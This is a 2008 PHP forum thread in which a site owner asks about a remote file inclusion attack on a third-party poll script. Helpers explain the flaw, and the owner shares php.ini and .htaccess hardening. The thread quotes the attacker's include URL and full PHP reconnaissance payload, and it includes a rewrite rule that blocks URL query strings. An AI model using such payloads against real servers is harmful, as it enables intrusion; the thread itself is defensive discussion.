n8w Posted June 21, 2008 Share Posted June 21, 2008 I have been having problems with hackers lately. Can you please tell me exactly what this means? I assume there is something insecure in my 3rd party poll? correct? I mad a ton of changes to my site yesterday .. and although they were not able to insert stuff on to my pages like before I got these errors in my error log [21-Jun-2008 07:54:37] PHP Warning: include() [<a href='function.include'>function.include</a>]: URL file-access is disabled in the server configuration in /home/user99/public_html/poll/errors.php on line 1 [21-Jun-2008 07:54:37] PHP Warning: include(http://queb3.info/cruise/tnet-id.txt???/errors.php) [<a href='function.include'>function.include</a>]: failed to open stream: no suitable wrapper could be found in /home/user99/public_html/poll/errors.php on line 1 [21-Jun-2008 07:54:37] PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'http://queb3.info/cruise/tnet-id.txt???/errors.php' for inclusion (include_path='.:/usr/lib/php When I went to the url and this is what is says <? echo "BraT<br>"; $alb = @php_uname(); $alb2 = system(uptime); $alb3 = system(id); $alb4 = @getcwd(); $alb5 = getenv("SERVER_SOFTWARE"); $alb6 = phpversion(); $alb7 = $_SERVER['SERVER_NAME']; $alb8 = gethostbyname($SERVER_ADDR); $alb9 = get_current_user(); $os = @PHP_OS; echo "os: $os<br>"; echo "uname -a: $alb<br>"; echo "uptime: $alb2<br>"; echo "id: $alb3<br>"; echo "pwd: $alb4<br>"; echo "user: $alb9<br>"; echo "phpv: $alb6<br>"; echo "SoftWare: $alb5<br>"; echo "ServerName: $alb7<br>"; echo "ServerAddr: $alb8<br>"; echo "NigeriaN HackerS TeaM<br>"; exit; ?> I assume there is something insecure in my 3rd party poll? correct? Link to comment https://forums.phpfreaks.com/topic/111250-what-is-the-hacker-doing/ Share on other sites More sharing options...
DarkWater Posted June 21, 2008 Share Posted June 21, 2008 Yes, I'm fairly sure that's it. Good thing you didn't have remote URL access (but this can be a bad thing if you ever need it...). =P Check for any vulnerabilities on Google. Off-topic: LOLOLOL THE "Nigerian Hackers Team". AHAHAHA. Link to comment https://forums.phpfreaks.com/topic/111250-what-is-the-hacker-doing/#findComment-570998 Share on other sites More sharing options...
PFMaBiSmAd Posted June 22, 2008 Share Posted June 22, 2008 The script you have is doing an include() where the parameter placed into the include() comes from a GET parameter on the end of the URL, but the scrip is not validating this external data before operating on it. The hacker is supplying a URL to his site as the GET parameter. The URL he is supplying is outputting raw php code. It is kind of funny that they would use a short open tag <? because if everyone was following php.net's recommendations to not use and to not enable short open tags, the hacker's code would have no effect.) If your server had allow_url_fopen and allow_url_include both on, then the raw php code would have been included and executed on your server and the various values would have been echoed. Just echoing that information is harmless, but once the hacker knows that he can inject and run his php code on your server, the next step is to take over your server for any purpose the hacker wants. Since your server has one or both of the allow_url_xxxxx setting turned off, the hacker is only getting back nothing or possible the error messages. This has been said many times before, but here it is again - ALL external data must be validated to insure it only contains expected values. Link to comment https://forums.phpfreaks.com/topic/111250-what-is-the-hacker-doing/#findComment-571359 Share on other sites More sharing options...
marklarah Posted June 22, 2008 Share Posted June 22, 2008 lol. pwd: should be cwd. And don't worry about it, this wont get your pass Link to comment https://forums.phpfreaks.com/topic/111250-what-is-the-hacker-doing/#findComment-571748 Share on other sites More sharing options...
n8w Posted June 22, 2008 Author Share Posted June 22, 2008 I made a lot of changes to my php.ini $parm[] = "register_globals = Off"; $parm[] = "session.use_trans_sid = 0"; $parm[] = "display_errors = Off"; $parm[] = "log_errors = on"; $parm[] = "error_log = /home/username/phperrors.log"; $parm[] = "allow_url_fopen = Off"; $parm[] = "allow_url_include = Off"; $parm[] = "session.save_path = /home/username/public_html/secretfolder"; $parm[] = "upload_tmp_dir = /home/username/public_html/secretfolder"; $parm[] = "upload_max_filesize = 1M"; and .htaccess #don't view files with the .inc extention <Files ~ "\.inc$"> Order allow,deny Deny from all </Files> #Preventing remote file include attacks with mod rewrite RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*) RewriteRule ^(.+)$ - [F] Link to comment https://forums.phpfreaks.com/topic/111250-what-is-the-hacker-doing/#findComment-571758 Share on other sites More sharing options...
Demonic Posted June 22, 2008 Share Posted June 22, 2008 Nice, I advise you to buy PHP Pro Security By Chris Snyder and Mike Southwell its sitting next to me Part 3 would help you a hell of a lot better from the book and part 2! Link to comment https://forums.phpfreaks.com/topic/111250-what-is-the-hacker-doing/#findComment-571763 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.